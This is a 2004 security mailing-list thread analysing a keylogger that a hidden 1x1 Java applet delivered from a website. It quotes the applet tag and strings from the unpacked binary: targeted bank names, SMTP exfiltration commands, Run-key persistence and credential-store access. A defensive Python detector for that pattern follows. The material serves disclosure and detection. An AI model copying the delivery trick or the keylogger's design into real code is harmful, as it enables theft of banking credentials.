This is a keylogger that will mail out your interesting logs to some Russian address! So beware of this one,
but what I couldn't understand is how is this file executed?

-aditya

> -----Original Message-----
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of
> [EMAIL PROTECTED]
> Sent: Sunday, February 15, 2004 11:40 PM
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Re:
> http://federalpolice.com:[EMAIL PROTECTED]
>
>
> From the source of that page:
>
> APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1
>
> BlackBox.class is detected immediately by my virus scanner as
> ClassLoader/E, more info:
> http://www.viruslibrary.com/virusinfo/Trojan.Java.ClassLoader.htm
>
> The javautil.zip appears to be an exe file renamed to zip. The
> exe is compressed with FSG.
>
> Interesting pieces of output from strings on the decompressed exe:
>
>
> ----------------------------------------------BEGIN
> HookerDll.Dll
> Install
> Uninstall
> EDIT
> %s\%s
> WVS3
> \kgn.txt
> Hooker.dll
> Install
> Uninstall
> Westpac
> bendigo
> Bendigo
> e-bendigo
> e-Bendigo
> commbank
> Commonwealth
> NetBank
> Citibank
> Bank of America
> e-gold
> e-bullion
> e-Bullion
> evocash
> EVOCash
> EVOcash
> intgold
> INTGold
> paypal
> PayPal
> bankwest
> Bank West
> BankWest
> National Internet Banking
> cibc
> CIBC
> scotiabank
> ScotiaBank
> Scotia Bank
> bank of montreal
> Bank of Montreal
> royalbank
> Royal Bank
> RoyalBank
> tdwaterhouse
> TD Canada Trust
> TD Waterhouse
> president's choice
> President's Choice
> President Choice
> suncorpmetway
> Suncorp
> macquarie
> Macquarie
> INTgold
> 1mdc
> 1MDC
> TD Waterhouse
> goldmoney
> GoldMoney
> goldgrams
> pecunix
> Pecunix
> Pecun!x
> hyperwallet
> HyperWallet
> Wells Fargo
> Bank One
> Banesto
> CAIXA
> SunTrust
> Sun Trust
> Discover Card
> Washington Mutual
> Wachovia
> desjardins
> Chase
> 0+060F0
> 1$11161J1U1i1
> 2.2I2\2
> 3'3,3E3c3h3r3
> 4%42484>4D4J4P4V4\4b4h4n4t4z4
> DATA
> EHLO localhost
> Subject: KeyLog from (%s)
> MAIL FROM:<[EMAIL PROTECTED]>
> RCPT TO:<[EMAIL PROTECTED]>
> SOFTWARE\Microsoft\Windows\CurrentVersion\Run
> open
> pstorec.dll
> PStoreCreateInstance
> internet explorer
> http://
> wininetcachecredentials
> Cookie:
> ----------------------------------------------END
>
> I think you can draw your own conclusions about this file.
>
> Niels
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
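A defender-side check for the delivery pattern Niels describes (a 1x1 applet whose "zip" archive is really an executable carrying SMTP, Run-key and Protected Storage strings), added here as an example; it is not code from the original thread. The sample page, the archive bytes and the indicator table are constructed for illustration, and because the real binary is FSG-packed, the string check only tells you anything on an unpacked sample.

```python
import re

# Constructed sample page with a 1x1 applet like the one quoted in the post (not the real site).
SAMPLE_HTML = ('<html><body>Welcome.<APPLET ARCHIVE="javautil.zip" '
               'CODE="BlackBox.class" WIDTH=1 HEIGHT=1></APPLET></body></html>')
# Constructed stand-in for the downloaded "zip": an MZ header plus strings of the kind the post
# lists. The real file is FSG-packed, so these only appear after unpacking (packed: no hits).
FAKE_ARCHIVE = (b'MZ' + b'\x00' * 62 + b'EHLO localhost\x00Subject: KeyLog from (%s)\x00'
                b'MAIL FROM:<x>\x00SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\x00'
                b'PStoreCreateInstance\x00Hooker.dll\x00')
INDICATORS = {  # substrings taken from the strings output quoted above
    b'EHLO': 'speaks SMTP (mail exfiltration)',
    b'MAIL FROM:': 'speaks SMTP (mail exfiltration)',
    b'CurrentVersion\\Run': 'Run-key persistence',
    b'PStoreCreateInstance': 'Protected Storage credential access',
    b'Hooker.dll': 'keyboard hook DLL',
}
APPLET_RE = re.compile(r'<applet\b([^>]*)>', re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"?([^"\s>]+)"?')

def find_hidden_applets(html, max_dim=1):
    """(archive, code, width, height) for every applet drawn at most max_dim px square."""
    hits = []
    for m in APPLET_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        try:
            w, h = int(attrs.get('width', 0)), int(attrs.get('height', 0))
        except ValueError:
            continue  # non-numeric size: not the hidden-applet pattern
        if w <= max_dim and h <= max_dim:
            hits.append((attrs.get('archive'), attrs.get('code'), w, h))
    return hits

def classify_archive(data):  # trust the magic bytes, not the file extension
    if data[:2] == b'MZ':
        return 'pe'
    if data[:4] == b'PK\x03\x04':
        return 'zip'
    return 'unknown'

def suspicious_strings(data):  # deduplicated descriptions of indicators present in data
    return sorted({desc for needle, desc in INDICATORS.items() if needle in data})

def assess(html, archives):  # archives: archive name -> bytes fetched for offline analysis
    report = []
    for archive, code, w, h in find_hidden_applets(html):
        data = archives.get(archive, b'')
        kind = classify_archive(data)
        report.append({'archive': archive, 'code': code, 'size': f'{w}x{h}', 'content': kind,
                       'renamed_exe': kind == 'pe' and bool(archive) and archive.lower().endswith('.zip'),
                       'indicators': suspicious_strings(data)})
    return report
```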
